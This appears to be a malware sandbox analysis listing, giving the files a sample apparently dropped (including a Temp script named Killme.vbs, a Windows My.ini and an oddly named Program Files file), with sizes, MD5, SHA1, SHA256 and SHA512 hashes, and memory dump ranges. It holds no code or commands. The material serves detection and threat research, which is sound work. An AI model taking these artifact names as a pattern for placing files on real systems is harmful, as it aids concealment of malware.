7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

Download Submit
C:\Program Files\tohorbigs.rggyg

Filesize
40KB

MD5
42e1a78951f4fc7b6b584ad1bd172792

SHA1
0aff9d4fb957b5607c506f2920ff248e1667bf47

SHA256
131053ddf6c038d592703f4429064b4f696e4182b2bb4bda164ad469a938ad26

SHA512
de426b5917c383a67b14a9279e9051f6db8c419698a71a2bf92e1e77cbc94b226caecef7e07877011eb87b2b04af7a4d1f256894cac24ddcba60530afb9b6d1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NUB8HZ4Z\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killme.vbs

Filesize
289B

MD5
002077d60cba2c69c59a247eba5f8576

SHA1
1186fa70a16aaf5f6627c786303116da4c88b0f3

SHA256
e44e2eb41c899608c6efdc96c4c6ab7f51251a5e9f3f27f28fdd113101fcfc1f

SHA512
ece01ae876693bc814a547791ce5dca4e9c1eb7a2c8bed913b36c01ceb5c94fbd93f63361bd0aff3e9cea983a9a7d86fdc32c4fcfee356041fb7eb1b0a5901d8

Download Submit
C:\Windows\My.ini

Filesize
303B

MD5
c60733bafb88b793adb341777e794184

SHA1
8d4bc53629cb7711b0c3d1efdde0bdc36b0330aa

SHA256
b7b110a6b887a2a44b5cc3eec1429c54c2032a9dc2a56180c558794e2183b41f

SHA512
246d99b0d1b8aa4b1bb12faa555dc93a672f542a2725b7a581e4f28aa5feae6437ed60b32300d7b3236305a085fef0b3e139e08c449691c787be27f2b3d5d83f

Download Submit
C:\Windows\My.ini

Filesize
96B

MD5
0a54af3e006b218c97420df6ac021c82

SHA1
dc64b4ec3d34c940c68df914396b772dd7ac794d

SHA256
ae6ec53b43d2cee111d32d50701affbd4223d69ba042df6f8b52abf8e9b2ad29

SHA512
d1793ea33e0db4b8cfd6305777c075a23acb5c836c59c8174263353dc4d747e04f14260fd0333cdcf64ba87fc42687191782117afda1cecfb4ccb6caa3cb439b

Download Submit
\??\c:\about blank.htm

Filesize
78B

MD5
92d7f7e06dfac29bf36a63aed9d90da5

SHA1
97fd3f7bc9c1f751704bcd62ddf22ef1efe37852

SHA256
ba9b73d3f41635ddc86186161fe00f98cd28fa93642137d7599d3ecb88d1a92c

SHA512
bbf504c48d0474deb8f1c2af97e20b8f6dfab8b8b62fc46e82e2754337208fa875ccd3d77dafb6a5c3ceb2fbe38d3de4eb9fc0fb891289ba048426aaece3fecf

Download Submit
memory/3924-0-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download
memory/3924-36-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download